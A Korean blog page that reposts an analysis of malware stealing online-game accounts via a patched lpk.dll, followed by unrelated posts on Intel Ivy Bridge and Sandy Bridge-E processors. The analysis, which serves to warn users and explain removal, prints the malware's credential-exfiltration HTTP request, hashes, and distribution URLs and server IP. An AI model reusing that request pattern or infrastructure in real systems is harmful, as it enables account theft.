오늘은 악성코드에 대해 알아보겠습니다.

온라인 게임과 더불어 다른 게임의 계정을 해킹하는 코드들입니다.

잘보고 따라해주시기 바랍니다.

ws2help.dll 시스템 파일을 패치 -> 온라인 게임 계정 탈취 파일들

벌새님이 너무 정리를 잘해주셨습니다.

출처 : http://hummingbird.tistory.com/3033

주말을 이용하여 웹하드 등 국내 유명 사이트들이 제로데이(0-Day) 취약점으로 추정되는 악성코드로 인하여 보안 패치가 완벽하게 이루어진 시스템에서도 자동 감염이 이루어질 수 있는 부분을 발견하였습니다.


Windows 7 + Internet Explorer 9 환경에서 악의적으로 변조된 인터넷 사이트에 접속할 경우 사용자 계정 컨트롤(UAC) 기능을 통해 사용자 몰래 다운로드되어 실행되려는 scvhost.exe 파일의 허용 여부를 묻는 창이 생성되는 것을 확인할 수 있습니다.

만약 Window XP + Internet Explorer 8 환경에서는 위와 같은 UAC 보안 기능이 없으므로 해킹된 인터넷 사이트에 접속하는 동작만으로 자동으로 감염되는 것을 확인하였으며, 감염 후 자동으로 웹 브라우저가 종료되는 현상이 발생하는 현상도 있습니다.


만약 해당 창에서 사용자가 [예] 버튼을 클릭할 경우 감염으로 연결이 이루어지며, [아니요]를 클릭할 경우에는 [C:\Users\(사용자 계정)\AppData\Local\Temp\Low\scvhost.exe] 파일을 찾아 수동으로 삭제하시면 됩니다.

참고로 scvhost.exe(MD5 : 92a8a413f2597e737920db00f20768c0) 파일에 대해서는 nProtect 보안 제품에서 Trojan/W32.Agent.83490 (VirusTotal : 17/42) 진단명으로 진단되고 있으며, 알약(ALYac) 2.0 보안 제품에서는 Trojan.Dropper.OnlineGames.mi32 진단명으로 진단됩니다.


[악성코드 유포 경로 및 진단 정보]

h**p://174.1**.224.**/help.html
 ㄴh**p://174.1**.224.**/main.swf
h**p://174.1**.224.**/ad.html
 ㄴ h**p://174.1**.224.**/bin.html :: CVE-2010-0806 취약점
   ㄴ h**p://174.1**.224.**/help.txt(암호화) -> scvhost.exe

main.swf (MD5 : b45163febcc2a91950a636bac5369c11)
 - nProtect : Trojan-Exploit/W32.SWFlash.3824.IZ (VirusTotal : 1/42)

bin.html
 - nProtect : Script-JS/W32.Agent.CEC (VirusTotal : 12/42)

유포되는 사이트에서는 2개의 악성 스크립트 파일을 통해 Internet Explorer 웹 브라우저의 CVE-2010-0806 취약점과 Adobe Flash Player 취약점을 이용하는 것으로 보입니다.

하지만 해당 보안 패치가 이루어진 환경에서도 Windows XP 환경에서는 자동 감염이 이루어지고, Windows 7 환경에서도 정상적으로 파일 다운로드가 된다는 점에서 알려지지 않은 새로운 Adobe Flash Player 취약점이 포함되어 있는 것이 아닌가 추정됩니다.

[생성 폴더 / 파일 등록 정보]

C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%
C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
C:\WINDOWS\system32\2011612204611.dll :: 해당 파일은 2011(Random 9~10자리 숫자).dll 유형, lpk.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\lpk32.dll :: lpk.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\lpk.dll :: lpk.dll 패치 파일(악성 파일), 변경 전 파일 크기 - 22,016 Bytes / 변경 후 파일 크기 - 33,586,058 Bytes
[생성 파일 진단 정보]

C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
 - MD5 : 3C6B2938356F9AB3D406538BD6228FEE
 - Hauri ViRobot : Trojan.Win32.PSWIGames.33598862

C:\WINDOWS\system32\lpk.dll
 - MD5 : 13E9EE212FBFB0263309F87054958A34
 - AhnLab V3 : Trojan/Win32.OnlineGameHack


해당 악성코드에 감염된 PC는 정상적인 lpk.dll(Language Pack) 파일을 패치하여 lpk32.dll 파일로 백업을 하고, 악성 lpk.dll 파일은 정상적인 시스템 파일처럼 다양한 프로세스에 추가되어 사용자의 눈을 속이고 있습니다.

악성 lpk.dll 파일은 기존의 유사한 감염 방식으로 꾸준하게 발견되고 있으며, 국내 온라인 게임 피망, 넷마블, 메이플스토리, 던전앤파이터 등의 계정 정보를 탈취할 수 있습니다.

GET /ooo/net/mail.asp?a1=1&a3=(넷마블 ID)&a4=(비밀번호) HTTP/1.1
User-Agent: WinInet
Host: www.iiiigame.com
Cache-Control: no-cache

실제 감염된 환경에서 넷마블 사이트에서 로그인을 시도할 경우 미국(USA)에 위치한 174.128.224.107 서버로 계정 정보를 이메일을 통해 전송하는 동작을 확인할 수 있습니다.

만약 보안 제품으로 문제가 해결되지 않는 분들은 다음과 같은 절차에 따라 수동으로 해결하시기 바랍니다.

먼저 모든 프로그램을 종료한 상태에서 다음의 폴더, 파일을 수동으로 삭제하시기 바랍니다.

  • C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%
  • C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
  • C:\WINDOWS\system32\2011(Random 9~10자리 숫자).dll

다음으로는 lpk.dll 파일의 확장자명을 다음과 같이 변경합니다.

  • C:\WINDOWS\system32\lpk.dll → C:\WINDOWS\system32\lpk.dll-

사용자가 악성 lpk.dll 파일의 확장자를 변경하면 윈도우 파일 보호(WFP) 기능으로 자동으로 정상적인 lpk.dll 파일이 복원되므로 참고하시기 바랍니다.

파일 확장자를 변경한 후에는 반드시 시스템 재부팅을 한 후, 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\system32\lpk32.dll
  • C:\WINDOWS\system32\lpk.dll-

위와 같이 문제를 해결한 후에는 반드시 유명 보안 제품을 이용하여 시스템 정밀 검사를 하시기 바라며, 온라인 게임 해킹 예방을 위해 본인이 이용하시는 온라인 게임 계정 비밀번호를 변경하시기 바랍니다.

이번 사례의 경우에는 보안 패치가 잘 이루어진 환경에서도 자동 감염이 예상되므로 매우 주의하시기 바라며, 악성코드를 유포하는 인터넷 사이트는 되도록 이용하지 않도록 하시는 것이 차후에도 유사한 공격을 예방할 수 있는 방법입니다.


저작자표시 비영리 변경금지

'기계들 > 컴퓨터' 카테고리의 다른 글

이번에 사려는 컴퓨터를 찾아 보았다.!! ㅠㅠ 환율  (0) 2011.09.30
인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 [출처] 인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 (Ever Coms Club [PC견적, 윈도우 오류, PC조립, PC정보, 친목]) |작성자 패록  (0) 2011.09.19
샌디브릿지 후속 제품 아이비 브릿지  (0) 2011.09.19
오늘은 i7 샌디브릿지 -E 대해..  (0) 2011.09.16

0123456789101112131415


스펙은 대충 이렇다

Antec 옐로우 케이스

i7 2600k

램 지스킬 17600 *8G 또는 삼성 10600인가 16기가로 할 생각이다.

보드 : p67 디럭스모델

파워 : 미정

그래픽 GTX 440 또는 460
저작자표시 비영리 변경금지

'기계들 > 컴퓨터' 카테고리의 다른 글

악성 탈취 코드 ws2help.dll등 외 여러가지 악성코드 -출처 벌새  (0) 2012.01.12
인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 [출처] 인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 (Ever Coms Club [PC견적, 윈도우 오류, PC조립, PC정보, 친목]) |작성자 패록  (0) 2011.09.19
샌디브릿지 후속 제품 아이비 브릿지  (0) 2011.09.19
오늘은 i7 샌디브릿지 -E 대해..  (0) 2011.09.16

[기사 원본]

[출처 : 보드나라]


인텔이 2012년 초 발표할 것으로 알려진 32nm 샌디브릿지 (Sandy Bridge) 후속 22nm 아이비브릿지 (Ivy Bridge) 프로세서의 달라진 부분에 대한 스펙 정보가 공개되었다는 소식이다.

 

인텔의 샌디브릿지를 이을 프로세서는 아이비브릿지로 알려진 가운데 그간 일부 정보들이 공개되고 있었던 가운데 최근 computerbase는 아이비브릿지가 지원하는 기능과 스펙에 대한 정보들을 공개했다.

 

 

 

아이비브릿지는 익히 알려져 있듯이 샌디브릿지의 22nm 공정 개선 버전으로 볼 수 있으나 내장 그래픽과 외장 그래픽 지원, USB 지원 등 많은 부분에서 변화가 이루어질 것으로 알려져 있다.

 

아이비브릿지는 샌디브릿지와 마찬가지로 x8 + x8 Lane (레인)으로 분할되어 멀티 GPU 기술을 지원하는데 대역폭이 기존보다 2배 더 늘어난 PCI-Express 3.0을 도입해 레인 수는 변화가 없어도 대역폭은 실질적으로 증가된다. 그외 코어 구성이나 메모리 지원, AVX 명령어, AES-NI 명령어 지원, 최대 코어 수는 쿼드코어로 나타나고 있으며, 최대 L3 8MB 캐쉬 (LLC, Last Level Cache)를 제공한다.

 

메모리 지원은 듀얼채널에 DDR3-1600MHz까지 지원되고 SATA2 (3Gbps)는 4포트, SATA3 (6Gbps)는 2포트를 지원해 기존 P67/ H67과 차이는 없는 것으로 확인되며, PCIe 2.0 x8 레인을 제공한다. 인텔 7시리즈 칩셋으로 알려진 Z77/ Z75/ H77은 FDI 인터페이스를 제공해 아이비브릿지 내장 그래픽 출력을 지원한다.

 

 

USB 지원에서도 코드명 Panther Point로 알려진 Z77/ Z75/ H77 칩셋들은 USB 3.0을 네이티브로 지원하게 되며, USB 2.0은 10개, USB 3.0은 4포트를 제공할 것으로 알려져 있다.

 

 

샌디브릿지 내장 그래픽은 HD Graphics 2000은 6EU (실행유닛, EU, Execution Units), HD Graphics 3000은 12EU (코어i5 2500K/ 2600K)를 내장했고 노트북용에는 12EU가 모두 내장되어 데스크탑용에서는 차이를 보였는데 아이비브릿지에 내장되는 그래픽은 6EU - 16EU 사이로 실행 유닛이 증가되어 처리 성능도 개선될 것으로 예상된다. DirectX 지원도 10.1 지원에 머물던 샌디브릿지 내장 그래픽과 달리 아이비브릿지 내장 그래픽은 DirectX 11을 지원하며, OpenGL 3.1과 OpenCL 1.1을 지원한다.

 

아이비브릿지 내장 그래픽은 인텔의 7세대 그래픽에 속하고 블루레이 (Blu-Ray) 프로파일 2.0 지원, 비디오 디코드와 인코딩을 위한 퀵싱크 (Quick Sync) 기술 등도 개선될 것으로 예상된다. 또한, 3개의 독립 디스플레이 출력도 지원할 것으로 알려져 있다.

 

코드명 라이트피크 (Light Peak)로 알려진 썬더볼트 (Thunderbolt)도 USB 3.0과 함께 지원될 것이라는 소식들도 전해지고 있으며, 인텔이 샌디브릿지에서도 공개한 무선 디스플레이 출력 기술도 Intel Wireless Display 3.0으로 업그레이드될 것으로 알려져 있다.

 

 

플랫폼도 기존 P67/ H67/ H61과 샌디브릿지가 Huron River 플랫폼을 구성했는데 아이비브릿지와 Z77/ Z75/ H77 칩셋은 Chief River 플랫폼을 구성할 것으로 나타났다. 샌디브릿지와 같이 LGA1155 소켓을 적용하며, 기존 P67/ H67/ H61, Z68 칩셋도 아이비브릿지를 바이오스 업데이트로 지원할 것으로 알려져 있다.

 

아이비브릿지의 터보 모드 지원 클럭 등에 대한 정보는 아직 공개되지 않고 있으나 샌디브릿지와 같이 CPU와 내장 그래픽 부분 모두 지원될 것으로 예상되며, 기술적으로 큰 변화는 없을 것으로 예상된다.

[출처] 인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 (Ever Coms Club [PC견적, 윈도우 오류, PC조립, PC정보, 친목]) |작성자 패록

저작자표시

'기계들 > 컴퓨터' 카테고리의 다른 글

악성 탈취 코드 ws2help.dll등 외 여러가지 악성코드 -출처 벌새  (0) 2012.01.12
이번에 사려는 컴퓨터를 찾아 보았다.!! ㅠㅠ 환율  (0) 2011.09.30
샌디브릿지 후속 제품 아이비 브릿지  (0) 2011.09.19
오늘은 i7 샌디브릿지 -E 대해..  (0) 2011.09.16

인텔 2세대 코어 프로세서 ‘샌디브릿지’의 후속 제품이 될 ‘아이비브릿지’가 오는 2012년 3월 출시될 것이라는 소식이 전해졌다.

32나노 공정에서 제조된 샌디브릿지를 대체할 제품으로 22나노 공정에서 제조될 아이비브릿지가 당초 올해 4분기 출시가 예상됐으나 2012년 3~4월로 연기됐다는 소식이 전해졌고, 이를 대만 IT매체인 digitimes가 메인보드 제조사의 정보를 인용해 2012년 3월로 확인했다고 밝혔다.

인텔 아이비브릿지의 이번 출시 연기는 지난 2월 샌디브릿지 지원 6시리즈 칩셋 문제로 인해 PC와 노트북 판매에 영향을 미쳤던 것을 계기로 판매에 앞서 지원 업체에 안정화를 위한 추가시간 제공이 이유인 것으로 전해졌다.

한편 22나노 공정에서 만들어지는 아이비브릿지는 컴퓨텍스 2011에서 소개되는 등 관련 정보가 조금씩 공개되고 있다. 얼마 전 아이비브릿지 샘플이 공개되기도 했으며, 2011년 11월부터는 대량 생산에 들어갈 것으로 예고되기도 했다.

아이비브릿지는 샌디브릿지와 같은 LGA1155 소켓 방식이며 트라이게이트(Tri-Gate) 3D 트랜지스터 기술을 도입해 소비전력과 발열 감소, 동작 속도 향상과 함께 내장 그래픽이 다이렉트X 11 지원을 지원함과 동시에 성능도 개선될 것으로 알려졌다.

 
 출처 : http://cafe.naver.com/clpcbang.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=1067&


유출된 사양

출처 : zol.com.cn


 

인텔은 그들의 하이엔드 샌디 브리지-E 라인업을 2011년 4사분기에 내놓기로 결정했으며, 2012년 2분기에는 아이비 브리지를 내놓기로 했다. 한 중국의 포럼에서 이에 해당하는 두개의 실제 인텔 아이비 브리지 프로세서를 공개했다.

 

아래 보이는 두개의 샘플 아이비 브리지 프로세서  ”QAX5″ 와 “QAX2″이다. QAX5는 콰드코어 모델이며 클럭은 1.80Ghz (터보 코어 클럭은 미정)이며 8MB의 3차 캐쉬를 지니고 있고 TDP는 95W이며 Vcore 전압은 0.8-1.25V 이다. 내장 그래픽은 DX11을 지원하며 클럭은 1600MHz로 맞추어져 있다.

 

QAX2 모델은 듀얼 코어에 Cpu는 1.8GHz이며 터보 코어 클럭은 밝혀지지 않았다. 4MB L3 캐쉬를 지니고 있으며, TDP는 95W이며 Vcore  전압은 0.8-1.25V이고 그래픽은 1600MHz로 맞추어져 있다.

 

클럭으로 보아하건데, 이 제품은 엔트리 레벨 아이비 브리지인듯 하며 하이엔드의 클럭은 2.5-3.5Ghz일것으로 예상된다.?

 




 
저작자표시

'기계들 > 컴퓨터' 카테고리의 다른 글

악성 탈취 코드 ws2help.dll등 외 여러가지 악성코드 -출처 벌새  (0) 2012.01.12
이번에 사려는 컴퓨터를 찾아 보았다.!! ㅠㅠ 환율  (0) 2011.09.30
인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 [출처] 인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 (Ever Coms Club [PC견적, 윈도우 오류, PC조립, PC정보, 친목]) |작성자 패록  (0) 2011.09.19
오늘은 i7 샌디브릿지 -E 대해..  (0) 2011.09.16


 

쓰레드 16개로도 볼 수 있지만 실제 코어 8개네요 …

 

어우어우 …그래도 더블 쿼드코어인데 무서워요 …

 

이건 완전 ….사기네요.

 

하지만 AMD에서는 쿼드코어 3개 박힌 코어 16개가 있지만 쓰레드가 …기술이 없네요..

인텔. 샌디 브릿지-E 11월 15일 출시

PARKOZ HARDWARE 원본출처 : DonanimHaber, Expreview
 

 

샌디 브릿지-E 11월 15일 출시

 

Donanimhaber가 인텔샌디 브릿지-E 프로세서를 11월 15일에 출시될 것이라고 밝혔다.

가장 먼저 6코어 모델인 Core i7-3960X, Core i7-3930K와 쿼드코어 모델인 Core i7-3820이 출시된다.

 

 

그러나 애초에 네이티브로 PCI-E 3.0과 USB 3.0 을 지원한다던 X79 칩셋이 PCI-E 2.0과 USB 2.0만을 지원할 것이라는 소식도 들려왔다.

  
01

 

 

관련글 블로그 출처

http://jjanggu327.blog.me/80139545161

'기계들 > 컴퓨터' 카테고리의 다른 글

악성 탈취 코드 ws2help.dll등 외 여러가지 악성코드 -출처 벌새  (0) 2012.01.12
이번에 사려는 컴퓨터를 찾아 보았다.!! ㅠㅠ 환율  (0) 2011.09.30
인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 [출처] 인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 (Ever Coms Club [PC견적, 윈도우 오류, PC조립, PC정보, 친목]) |작성자 패록  (0) 2011.09.19
샌디브릿지 후속 제품 아이비 브릿지  (0) 2011.09.19

+ Recent posts

티스토리툴바